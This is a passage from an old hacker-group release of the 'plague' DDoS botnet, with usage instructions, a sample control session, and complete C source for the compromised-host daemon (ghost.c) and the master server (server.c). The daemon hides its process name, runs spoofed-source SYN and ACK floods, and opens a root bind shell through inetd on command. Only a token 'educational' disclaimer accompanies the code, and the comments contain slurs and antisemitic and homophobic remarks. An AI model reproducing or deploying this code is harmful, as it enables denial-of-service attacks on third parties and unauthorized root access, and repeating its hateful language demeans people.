you install the ghosts on. This file should be put in the same directory
from where you will run the master server. and example server.list would
look like this
127.0.0.1 567 lamehost
64.123.76.0 775 fearme
155.245.119.254 23 changepass
which consists of IP PORT and PASSWORD respectivly.
to install the server
#./server <port> &
and it will read server.list and fork into the backgound and listen on the
specified port.
4. Running the plague network
to connect to the server you will need to download netcat
get this from www.l0pht.com/~weld/netcat the real client is still being
worked on so you will have to make do with with netcat for now , telnet
will not work.
connect to the server as follows
#nc SERVER_IP PORT
here is an example run
[root@triton]#nc 127.0.0.1 1234
Plague by datawar/blazinweed u r 0wn3d
Login: ld.so.1
Excellent!
Try typing help for command list
Idle connection time set correct.
plague>help
quit - Closes your connection
help - Prints out this shit
stream - <port> <ip of target> <time>
syn - <port> <ip of target> <time>
bindshell - <ip of miniserver> <port>
pingall - Checks if ghosts are up
plague>stream 0 127.0.0.1 10
this would make the ghosts attack 127.0.0.1 with random sourced ack packets
for ten seconds.
plague>syn 0 127.0.0.1 20
this would make the ghosts attack 127.0.0.1 with random sourced syn packets
for 20 seconds.
plague>bindshell 45.45.45.45 1234
this would make the ghost ip 45.45.45.45 bind a shell to port 1234 you would
then just telnet to this port and be dropped to a root shell.
plague>pingall
1.1.1.1 UP
2.2.2.2 UP
this shows that ghosts 1.1.1.1 2.2.2.2 are all up and ready for commands.
NOTE this code is for *educational* use only we can not be held responsible for
any damages that may arise through the misuse of this code.
read comments at the head of the source files for additional information.
plague was brought to you by
blazinweed and datawar
Shouts
------
#kode@dalnet #darkcyde@efnet
hybrid , dxmtr1p , py- , screwloose , paint , xnec , ep0ch , psyclone
and everyone else that has supported us during the writing of this code.
K1dD13 Gr3Etz
------------
JimeJones - phear this kids use of the poll() function. Wow JimJones you can
poll a socket can I be like you ?
Th1nk - aka hax0rk1ng he rerooted cybernetix's boxes with ./amdexa pheer him.
#!/bin/zsh - go here if you want to see faggots have group sex.
msg from blazinweed to JimJones
If i didn't school you hardcore that day in #darkcyde then why did you go to
all the trouble of removing rpclist.c and ciscoscan.c from your site :).
------------------------------------------------------------------------------
ghost.c by blazinweed
------------------------------------------------------------------------------
/*
ghost.c coded by blazinweed Email: blazinweed@stoned.com
this daemon is part of the plague package written by blazinweed & datawar
plague is a distributed dos/scanning network implemented properly
we wrote this because trinoo/tfn/mstream suck !@#!!@%!$@
this was a quick and dirty hack so if you don't like it don't use it.
I do plan to improve on this code and add alot more features stay tuned.
NOTES
==============
************************************************************
1. STREAM fixed by blazinweed
************************************************************
I chose stream due to its good interoperability with many os's
I've had it compile on bsd/solaris/linux/digitalunix.
The orginal stream.c , stream2.c and Mstream were fundementaly flawed because
they did not respect the socket_not_ready errno. The consequences
of which would send the cpu to 100% as it tried to send packets down a
unready raw socket and be flooded with errno.
the fix to this was relativly simple with only the need for a usleep(0.01)
before the sendto() ; this gave the socket enough time to get ready.
This version of stream is much more deadly so be careful!@.
***********************************************************
3. Syn flooder fixed by blazinweed to flood for a duration
***********************************************************
this was originaly going to be slice.c but it didn't work
to well with solaris so i switched to punk.c
***********************************************************
3. BIND SHELL
***********************************************************
its lame but does the job well and binds a shell to a port on
a selected daemon oh and don't forget to
kill -9 ` ps -ef | grep "/inetd -s /tmp" | awk '{print $2} '`
kill -HUP `ps -ef | grep " /usr/sbin/inetd -s" | awk '{print $2} '`
once your done with your shell as it gives other people access.
***********************************************************
4. INSTALL/RUN module
**********************************************************
--still to do
**********************************************************
5. PORT SCAN
***********************************************************
ls
-- still to do
in order for the fake arg's to work the program name needs to be longer than the fake args
*/
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <unistd.h>
#include <limits.h>
#ifdef SOLARIS
typedef unsigned int socklen_t; // fix0r the socklen_t bug compile with -DSOLARIS on sol boxen
#endif
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
#define PACKETSIZE (sizeof(struct ip) + sizeof(struct tcphdr))
#define PORT 6969
#define MAXLINE 1024
#define PROCNAME "-csh"
#define MAGIK "ld.so.1"
/* use lib name as pass to stop admin from noticed pass using strings on bin */
/* pass in plain txt for now */
#define STREAM 'A'
#define SYN 'B'
#define BIND_SHELL 'C'
#define PING 'D'
/* prototypes */
void auth(int conn) ;
void stream(int port , char ip[] , int duration) ;
void syn_flood(int port , char ip[] , int duration) ;
void run(char module[]) ;
/* end function prototypes */
struct ip *ip_syn;
struct tcphdr *tcp_syn;
struct sockaddr_in s_in_syn;
u_char packet_syn[PACKETSIZE];
int get_syn ;
u_long source_syn,target_syn;
int timer ;
int main(int argc , char **argv)
{
int listenfd , connfd ;
pid_t childpid ;
int i , j ;
pid_t pid ;
socklen_t clilen ;
int argvlen ;
struct sockaddr_in cliaddr , servaddr ;
/* faking argv[0] the uber elite nmap way*/
argvlen = strlen(argv[0]);
strncpy(argv[0], PROCNAME, strlen(PROCNAME));
for(i = strlen(PROCNAME); i < argvlen; i++) argv[0][i] = '\0';
for(i=1; i < argc; i++) {
argvlen = strlen(argv[i]);
for(j=0; j <= argvlen; j++)
argv[i][j] = '\0';
}
if((pid = fork()) != 0 )
exit(0) ;
setsid() ;
signal(SIGHUP , SIG_IGN) ;
fprintf(stdout, "\n\n fawking into background || coded by blazinweed || blazinweed@stoned.com\n\n\a");
if( (pid = fork()) != 0 )
exit(0) ;
chdir("/") ;
umask(0) ;
for (i = 0 ; i < 64 ; i++)
close(i) ;
if ((listenfd = socket(AF_INET , SOCK_STREAM , 0 )) < 0)
{
perror("socket") ;
exit(-1) ;
}
bzero(&servaddr , sizeof(servaddr)) ;
servaddr.sin_family = AF_INET ;
servaddr.sin_addr.s_addr = htonl(INADDR_ANY) ;
servaddr.sin_port = htons(PORT) ;
if(bind (listenfd , (struct sockaddr *) &servaddr , sizeof(servaddr)) < 0)
{
perror("bind") ;
exit(-1) ;
}
if(listen(listenfd , 10) < 0 )
{
perror("listen" ) ;
exit(-1) ;
}
signal(SIGHUP, SIG_IGN);
signal(SIGCHLD, SIG_IGN);
for( ; ; )
{
clilen = sizeof(cliaddr) ;
if( (connfd = accept(listenfd , (struct sockaddr *) &cliaddr , &clilen)) < 0 )
{
perror("accept") ;
exit(-1) ;
}
if( ( childpid = fork()) == 0 )
{
close(listenfd) ;
auth(connfd) ;
exit(0) ;
}
close(connfd) ;
}
}
void auth(int sockfd)
{
ssize_t n ;
char line[MAXLINE] ;
char type[8], pass[30] , port[30] , ip[30] , time[30];
char heh[100] ;
bzero(line , 1024) ;
bzero(type , 8 ) ;
bzero(pass , 30) ;
bzero(port , 30) ;
bzero(ip , 30) ;
bzero(time , 30) ;
if( (n = read(sockfd , &line , MAXLINE)) == 0 )
exit(-1) ; // remote host closed socket
sscanf(line ,"%s %s %s %s %s",type , pass ,port , ip , time ) ;
if(!strcmp(pass , MAGIK) == 0)
{
write(sockfd , "wrong pass" ,sizeof("wrong pass")) ;
shutdown(sockfd, 2); // invalid password
return ;
}
switch(type[0])
{
case STREAM : // stream like a jew
stream(atoi(port) , ip , atoi(time)) ;
break ;
case SYN : //syn flood
syn_flood(atoi(port) , ip , atoi(time)) ;
break ;
case BIND_SHELL:
sprintf(heh , "/bin/echo \'%s stream tcp nowait root /bin/sh sh -i\'> /tmp/h;/usr/sbin/inetd /tmp/h &" , port) ;
system(heh ) ;
break ;
case PING :
write(sockfd ,"PONG" ,sizeof("PONG")) ;
break ;
}
shutdown(sockfd , 2 ) ;
}
/**************************************************************************/
/* __START__ STREAM FLOOD CODE */
/**************************************************************************/
struct ip_hdr {
u_int ip_hl:4, /* header length in 32 bit words*/
ip_v:4; /* ip version */
u_char ip_tos; /* type of service */
u_short ip_len; /* total packet length */
u_short ip_id; /* identification */
u_short ip_off; /* fragment offset */
u_char ip_ttl; /* time to live */
u_char ip_p; /* protocol */
u_short ip_sum; /* ip checksum */
u_long saddr, daddr; /* source and dest address */
};
struct tcp_hdr {
u_short th_sport; /* source port */
u_short th_dport; /* destination port */
u_long th_seq; /* sequence number */
u_long th_ack; /* acknowledgement number */
u_int th_x2:4, /* unused */
th_off:4; /* data offset */
u_char th_flags; /* flags field */
u_short th_win; /* window size */
u_short th_sum; /* tcp checksum */
u_short th_urp; /* urgent pointer */
};
struct tcpopt_hdr {
u_char type; /* type */
u_char len; /* length */
u_short value; /* value */
};
struct pseudo_hdr { /* See RFC 793 Pseudo Header */
u_long saddr, daddr; /* source and dest address
*/
u_char mbz, ptcl; /* zero and protocol */
u_short tcpl; /* tcp length */
};
struct packet {
struct ip/*_hdr*/ ip;
struct tcphdr tcp;
/* struct tcpopt_hdr opt; */
};
struct cksum {
struct pseudo_hdr pseudo;
struct tcphdr tcp;
};
struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long dstaddr;
int sock;
/* This is a reference internet checksum implimentation, not very fast */
inline u_short in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits. */
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *) w;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
u_long lookup(char *hostname)
{
struct hostent *hp;
if ((hp = gethostbyname(hostname)) == NULL) {
fprintf(stderr, "Could not resolve %s.\n", hostname);
exit(1);
}
return *(u_long *)hp->h_addr;
}
void flooder(void)
{
struct timespec ts;
int i;
int start , end , stop ;
start = time(NULL) ;
end = start + timer ;
stop = 0 ;
memset(&packet, 0, sizeof(packet));
ts.tv_sec = 0;
ts.tv_nsec = 10;
packet.ip.ip_hl = 5;
packet.ip.ip_v = 4;
packet.ip.ip_p = IPPROTO_TCP;
packet.ip.ip_tos = 0x08;
packet.ip.ip_id = rand();
packet.ip.ip_len = FIX(sizeof(packet));
packet.ip.ip_off = 0; /* IP_DF? */
packet.ip.ip_ttl = 255;
packet.ip.ip_dst.s_addr = dstaddr;
packet.tcp.th_flags = 0;
packet.tcp.th_win = htons(16384);
packet.tcp.th_seq = random();
packet.tcp.th_ack = 0;
packet.tcp.th_off = 5; /* 5 */
packet.tcp.th_urp = 0;
packet.tcp.th_sport = rand();
packet.tcp.th_dport = dstport?htons(dstport):rand();
/*
packet.opt.type = 0x02;
packet.opt.len = 0x04;
packet.opt.value = htons(1460);
*/
cksum.pseudo.daddr = dstaddr;
cksum.pseudo.mbz = 0;
cksum.pseudo.ptcl = IPPROTO_TCP;
cksum.pseudo.tcpl = htons(sizeof(struct tcphdr));
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = dstaddr;
s_in.sin_port = packet.tcp.th_dport;
while(!stop) {
cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random();
++packet.ip.ip_id;
++packet.tcp.th_sport;
++packet.tcp.th_seq;
if (!dstport)
s_in.sin_port = packet.tcp.th_dport = rand();
packet.ip.ip_sum = 0;
packet.tcp.th_sum = 0;
cksum.tcp = packet.tcp;
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
packet.tcp.th_sum = in_cksum((void *)&cksum,
sizeof(cksum));
usleep(0.01) ; // :))))))))))))
if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr
*)&s_in, sizeof(s_in)) < 0)
perror("jess");
if(time(NULL) > end)
{
close(sock) ;
stop = 1 ;
}
}
stop = 0 ;
}
void stream(int port, char ip[] , int duration)
{
int on = 1;
timer = duration ;
if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(1);
}
setgid(getgid()); setuid(getuid());
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on,
sizeof(on)) <0) {
perror("setsockopt");
exit(1);
}
srand((time(NULL) ^ getpid()) + getppid());
dstaddr = lookup(ip);
dstport = port;
pktsize = 100;
flooder();
/**************************************************************************/
/* __END__ STREAM FLOOD CODE */
/**************************************************************************/
}
/**************************************************************************/
/* __START__ SYN FLOOD CODE */
/**************************************************************************/
void makepacket(void) /* Thanks Richard Stevens, R.I.P. */
{
memset(packet_syn, 0 , PACKETSIZE);
ip_syn = (struct ip *)packet_syn;
tcp_syn = (struct tcphdr *) (packet_syn+sizeof(struct ip));
ip_syn->ip_hl = 5;
ip_syn->ip_v = 4;
ip_syn->ip_tos = 0;
ip_syn->ip_len = FIX(PACKETSIZE);
ip_syn->ip_off = 0;
ip_syn->ip_ttl = 40;
ip_syn->ip_p = IPPROTO_TCP;
ip_syn->ip_dst.s_addr= target_syn;
tcp_syn->th_flags = TH_SYN;
tcp_syn->th_win = htons(65535);
s_in_syn.sin_family = AF_INET;
s_in_syn.sin_addr.s_addr = target_syn;
}
void kill_port(u_int dstport)
{
if (source_syn==0)
ip_syn->ip_src.s_addr = random();
else
ip_syn->ip_src.s_addr = source_syn;
ip_syn->ip_id = random();
tcp_syn->th_sport = random();
tcp_syn->th_dport = htons(dstport);
tcp_syn->th_seq = random();
tcp_syn->th_ack = random();
tcp_syn->th_sum = in_cksum((u_short *)tcp_syn, sizeof(struct tcphdr));
ip_syn->ip_sum = in_cksum((u_short *)packet_syn, PACKETSIZE);
s_in_syn.sin_port = htons(dstport);
sendto(get_syn,packet_syn,PACKETSIZE,0,(struct sockaddr *)&s_in_syn,sizeof(s_in_syn));
usleep(0.01);
}
void syn_flood(int p ,char ip[] , int duration)
{
int low,high,port;
int start , end , stop ;
timer = duration ;
start = time(NULL) ;
end = start + timer ;
stop = 0 ;
if ((get_syn = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("socket");
exit(1);
}
printf("\nflooding target \n",target_syn);
fflush(stdout);
source_syn=0;
target_syn = lookup(ip);
low = 0;
high = 65000;
makepacket();
while(!stop) {
srandom(time(NULL));
for(port = low; port <=high; port++)
kill_port(port);
if(time(NULL) > end){ close(get_syn) ; stop = 1; }
}
stop = 0 ;
}
/**************************************************************************/
/* __END__ SYN FLOOD CODE */
/**************************************************************************/
------------------------------------------------------------------------------
server.c by datawar
------------------------------------------------------------------------------
/*
Coded by datawar
dw@dtmf.org || dw@f41th.com
http://www.f41th.com
Features:
=========
- timeouts: Idle timeouts are supported.
- login: A trivial passwd verification.
- pingall: It will check all the ghosts to see if they are up.
- sniff: Enables sniffing of other ppl u r 'sharing' the plague network with.
- verbose: Just logs the connections of ppl connected to the server
- bindshell: Will open a shell on the port/ip u define.
- syn/stream:The main server will take care to communicate with all the ghosts
and make sure all of them are streaming/syn flooding the target.
A good idea is to stop using the plague network in such a process.
Note:everything is saved to the logfile defined. make sure u edit all ur defines
also run as './server port &' to make it background. It forks as the name
u have defined.
TODO:
=====
The next release will include:
- Encryption
- Distributed scanning which will split up say an A class to all the ghosts
hehe it will be nice to scan an A class network in minutes.
* banner scanning
* port scanning
All of them in stealth mode and certain features to make it quick.
- Hax0ring, it will try possible exploits of ur own in a script file.
- Heh enough we cant say everything :P
greetz fly out to:
==================
#kode@DALnet
#darkcyde@EFnet
Special propz go to: (in no particular order)
=============================================
hybrid (phreaking elite ? p.s. we need to own those lamers on the LAN)
blazinweed (long good friend always helped me out ...)
dxmtr1p (uNF uNF, #phrack scene sluts suck)
py- (we need to work on this 'Shiva landrover' flow)
Screwloose (I have a couple of screws loose)
psyclone (no one smokes that much weed as I do)
paint (> *)
*/
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
/**************************************************************************/
/* MODIFY FROM HERE ON */
/**************************************************************************/
#define PROC_APPEAR_AS "-tcsh" // Enter anything
/*
The name of the file containing the ips with the miniservers in the format:
127.0.0.1 567 lamehost
64.123.76.0 775 fearme
155.245.119.254 23 changepass
ip port passwd\n
*/
#define IPS "server.list"
/* file containing the server logs */
#define LOG "server.log"
/* Just log more shit */
#define VERBOSE 1 // Enter 0 to disable
/* Incase you are sharing with other users and wanna know what they are doing */
#define SNIFF 0 // Enter 1 to enable
/* max que # of connections */
#define QUE 31337
/* How much a connection can idle without doing anything */
#define IDLE_TIMEOUT 30 // Note value is in seconds
/* How long we should wait for a reply from a ghost */
#define PONG_TIMEOUT 10 // Value in seconds as usual
/* hehe try to avoid 'strings | grep' */
#define PASSWD "ld.so.1" // Need I say more ?
/**************************************************************************/
/* DONE */
/**************************************************************************/
struct cmds
{
int opcode;
char *name;
char *usage;
};
enum opcodes
{
QUIT = 1,
HELP = 2,
DOS = 3,
SHELL = 4,
SYN_ATTACK = 5,
PINGALL = 6,
DEFAULT = 7
};
struct cmds boo[DEFAULT] =
{
{ QUIT, "quit", "\t\t-\tCloses your connection\n" },
{ HELP, "help", "\t\t-\tPrints out this shit\n" },
{ DOS, "stream", "\t\t-\t<port> <ip of target> <time>\n" },
{ SYN_ATTACK, "syn", "\t\t-\t<port> <ip of target> <time>\n" },
{ SHELL, "bindshell", "\t-\t<ip of miniserver> <port>\n" },
{ PINGALL, "pingall", "\t\t-\tChecks if ghosts are up\n" },
{ DEFAULT, NULL, NULL }
};
FILE *fp;
char tmp1[200]; // for da logging shiet
void wipe(void); // any pids ?
void communicate(int sock);
void log(char a[]);
int parsecmd(char buf[], int sock);
int sendcommand(char cmd[], char ip[], int port);
int main(int argc, char *argv[])
{
int port, localsock, remotesock, tmp=0;
struct sockaddr_in local, remote;
socklen_t wh00t;
pid_t hehe;
#ifndef VERBOSE
#define VERBOSE 1
#endif
system("clear"); // hi Jimjones
signal(SIGCHLD, (void *)wipe);
if(argc != 2){
fprintf(stderr, "try: %s <port>\n", argv[0]);
exit(-1);
}
fp = fopen(IPS, "r");
if(fp == NULL){
fprintf(stderr, "Checking for file with ips... ");
perror("fopen");
exit(-1);
}
fclose(fp);
fprintf(stdout, "\n\nCoded by datawar dw@dtmf.org || dw@f41th.com\n\n\a");
port = atoi(argv[1]);
localsock = socket(PF_INET, SOCK_STREAM, 0);
if(localsock == -1){
perror("socket");
exit(-1);
}
memset(&local, 0, sizeof(local));
local.sin_family = PF_INET;
local.sin_port = htons(port);
local.sin_addr.s_addr = INADDR_ANY;
if((tmp=bind(localsock, &local, sizeof(local))) == -1){
perror("bind");
exit(-1);
}
if((tmp=listen(localsock, QUE)) == -1){
perror("listen");
exit(-1);
}
// Fill the area args occupy on the stack with '\0'
for(tmp=0;tmp<argc;tmp++)
memset(argv[tmp], 0, strlen(argv[tmp]));
snprintf(argv[0], sizeof(PROC_APPEAR_AS), "%s", PROC_APPEAR_AS);
while(1){
remotesock = accept(localsock, &remote, &wh00t); // gow phuk urs3lf
if(VERBOSE == 1){
sprintf(tmp1, "Got connection from:\t%s:%d\n", inet_ntoa(remote.sin_addr), ntohs(remote.sin_port));
log(tmp1);
memset(tmp1, 0, 200);
}
hehe = fork();
if(!hehe){
communicate(remotesock);
_exit(0);
}
else {
if(VERBOSE == 1){
sprintf(tmp1, "Pid opened: %d\n", hehe);
log(tmp1);
memset(tmp1, 0, 200);
}
}
}
return 0;
}
void wipe(void)
{
pid_t pid;
// waitpid() is l33t
pid = waitpid(-1, NULL, WNOHANG);
if(VERBOSE == 1){
sprintf(tmp1, "Pid killed: %d\n", pid);
log(tmp1);
memset(tmp1, 0, 200);
}
}
/*
It communicates with the clients
*/
void communicate(int sock)
{
fd_set r;
struct timeval tv;
int sel, par;
char buf[100];
#ifndef SNIFF
#define SNIFF 0
#endif
memset(buf, 0, 100);
send(sock, "\nPlague by datawar/blazinweed u r 0wn3d\n\nLogin: ", 49, 0);
recv(sock, buf, sizeof(buf), 0);
buf[strlen(buf) - 1] = '\0';
if(SNIFF == 1){
sprintf(tmp1, "%s", buf);
log(tmp1);
memset(tmp1, 0, 200);
}
if(strcmp(buf, PASSWD)){
send(sock, "\nWrong passwd.\n\n", 16, 0);
shutdown(sock, 2);
return;
}
sprintf(tmp1, "Passwd check passed user logged in\n");
log(tmp1);
memset(tmp1, 0, 200);
send(sock, "\nExcellent!\n\nTry typing help for command list\n\n", 46, 0);
send(sock, "Idle connection time set correct.\n\n", 35, 0);
send(sock, "plague> ", 9, 0);
#ifdef IDLE_TIMEOUT
if(IDLE_TIMEOUT > 72){
sprintf(tmp1, "Connect has a limit on its own above 72 it has no effect\n");
log(tmp1);
memset(tmp1, 0, 200);
#undef IDLE_TIMEOUT
#define IDLE_TIMEOUT 72
}
#endif
while(1){
memset(buf, 0, 100);
FD_ZERO(&r);
FD_SET(sock, &r);
tv.tv_sec = IDLE_TIMEOUT;
tv.tv_usec = 0;
sel = select(sock+1, &r, NULL, NULL, &tv);
if(!sel || sel == -1){
send(sock, "\nTimeout\n\n", 9, 0);
shutdown(sock, 2);
return;
}
else if(sel > 0){
recv(sock, buf, sizeof(buf), 0);
buf[strlen(buf) - 1] = '\0';
if(SNIFF == 1){
sprintf(tmp1, "%s", buf);
log(tmp1);
memset(tmp1, 0, 200);
}
par = parsecmd(buf, sock);
if(par == 2)
return;
send(sock, "plague> ", 9, 0);
}
}
}
int parsecmd(char buf[], int sock)
{
char readn[100], tmp[20], cmd[100], ip[20], port[10];
char host[20], hostport[10], pass[30], timel[10];
int bow, len, i=0, count=0, flag=0;
memset(cmd, 0, 100); memset(ip, 0, 20); memset(port, 0, 10);
memset(tmp, 0, 20); memset(readn, 0, 100); memset(host, 0, 20);
memset(hostport, 0, 10); memset(pass, 0, 30); memset(timel, 0, 10);
while(buf[i] != '\0'){
if(isspace(buf[i]))
count++;
i++;
}
// Single string
if(count == 0){
if(!strcmp(buf, "help")){
bow=-1;
send(sock, "\n", 2, 0);
while(boo[++bow].opcode != DEFAULT){
len = strlen(boo[bow].name) + strlen(boo[bow].usage) + 1;
snprintf(cmd, len, "%s%s", boo[bow].name, boo[bow].usage);
send(sock, cmd, sizeof(cmd), 0);
memset(cmd, 0, 100);
}
send(sock, "\n", 2, 0);
}
else if(!strcmp(buf, "quit")){
send(sock, "bye!\n\n", 6, 0);
shutdown(sock, 2);
return 2;
}
else if(!strcmp(buf, "pingall")){
fp = fopen(IPS, "r");
while(!feof(fp)){
fgets(readn, 100, fp);
sscanf(readn, "%s %s %s", ip, port, pass);
if(strlen(ip) == 0){
memset(readn, 0, 100); memset(ip, 0, 20);
memset(cmd, 0, 100); memset(pass, 0, 30);
break;
}
sprintf(cmd, "D %s 0 0 0", pass);
send(sock, ip, strlen(ip), 0);
flag = sendcommand(cmd, ip, atoi(port));
if(flag == -1)
send(sock, "\tDOWN\n", 6, 0);
else
send(sock, "\tUP\n", 4, 0);
memset(readn, 0, 100); memset(ip, 0, 20);
memset(cmd, 0, 100); memset(pass, 0, 30);
}
fclose(fp);
}
else
send(sock, "Try help!\n", 10, 0);
}
// String with 2 args
else if(count == 2){
sscanf(buf, "%s %s %s", tmp, host, hostport);
if(!strcmp(tmp, "bindshell")){
if(strlen(tmp) > 1 && strlen(host) > 1 && strlen(hostport) > 1){
fp = fopen(IPS, "r");
while(!feof(fp)){
fgets(readn, 100, fp);
sscanf(readn, "%s %s %s", ip, port, pass);
if(!strcmp(ip, host)){
sprintf(cmd, "C %s %s 0 0", pass, hostport);
sendcommand(cmd, ip, atoi(port));
}
memset(ip, 0, 20); memset(port, 0, 10);
memset(pass, 0, 30); memset(readn, 0, 100);
}
fclose(fp);
}
else
send(sock, "Null arg detected\n", 19, 0);
}
else
send(sock, "Try help!\n", 10, 0);
}
// String with 3 args
else if(count == 3){
sscanf(buf, "%s %s %s %s", tmp, hostport, host, timel);
if(!strcmp(tmp, "stream") || !strcmp(tmp, "syn")){
if(strlen(hostport) > 1 && strlen(host) > 1 && strlen(timel) > 1){
fp = fopen(IPS, "r");
while(!feof(fp)){
fgets(readn, 100, fp);
sscanf(readn, "%s %s %s", ip, port, pass);
if(!strcmp(tmp, "stream"))
sprintf(cmd, "A %s %s %s %s", pass, hostport, host, timel);
else if(!strcmp(tmp, "syn"))
sprintf(cmd, "B %s %s %s %s", pass, hostport, host, timel);
sendcommand(cmd, ip, atoi(port));
memset(ip, 0, 20); memset(port, 0, 10);
memset(pass, 0, 30); memset(readn, 0, 100);
}
fclose(fp);
}
else
send(sock, "Null arg detected\n", 19, 0);
}
else
send(sock, "Try help!\n", 10, 0);
}
else
send(sock, "Try help!\n", 10, 0);
return 0;
}
/*
Returns -1 on error and 0 if everything goes ok
Sends the command to the mini servers
*/
int sendcommand(char cmd[], char ip[], int port)
{
int sock, sen, con, sel;
struct sockaddr_in m;
struct hostent *h;
struct timeval to;
fd_set r;
sock = socket(PF_INET, SOCK_STREAM, 0);
if(sock == -1){
sprintf(tmp1, "Socket error\n");
log(tmp1);
memset(tmp1, 0, 200);
return(-1);
}
memset(&m, 0, sizeof(m));
m.sin_family = PF_INET;
m.sin_port = htons(port);
h = gethostbyname(ip);
if(h == NULL){
sprintf(tmp1, "Cant resolve ip: %s", ip);
log(tmp1);
memset(tmp1, 0, 200);
return(-1);
}
memcpy(&m.sin_addr.s_addr, h->h_addr, h->h_length);
con = connect(sock, &m, sizeof(m));
if(con==-1){
sprintf(tmp1, "Connection failed for: %s\n", ip);
log(tmp1);
memset(tmp1, 0, 200);
return(-1);
}
sleep(1);
sen = send(sock, cmd, strlen(cmd), 0);
if(sen==-1){
sprintf(tmp1, "Data not sent correctly to ip: %s\n", ip);
log(tmp1);
memset(tmp1, 0, 200);
return(-1);
}
#ifdef PONG_TIMEOUT
if(PONG_TIMEOUT > 60){
sprintf(tmp1, "Warning timeout value over 1 min. !\n");
log(tmp1);
memset(tmp1, 0, 200);
}
#endif
#ifndef PONG_TIMEOUT
#define PONG_TIMEOUT 10
#endif
for(;;){
FD_ZERO(&r);
FD_SET(sock, &r);
to.tv_sec = PONG_TIMEOUT;
to.tv_usec = 0;
sel = select(sock+1, &r, NULL, NULL, &to);
// ph33r
switch(sel){
case 0:
return(-1);
case (-1):
return(-1);
case 1:
return 0;
}
}
return 0;
}
void log(char a[])
{
FILE *f;
f = fopen(LOG, "a");
fprintf(f, "%s\n", a);
fclose(f);
}
------------------------------------------------------------------------------
server.list
------------------------------------------------------------------------------
127.0.0.1 6969 ld.so.1
------------------------------------------------------------------------------
D4RKCYDE............. http://f41th.com
..................... #darkcyde (efnet)
..................... hybrid psyclone datawar grip
..................... PSTN NINJA STYLE.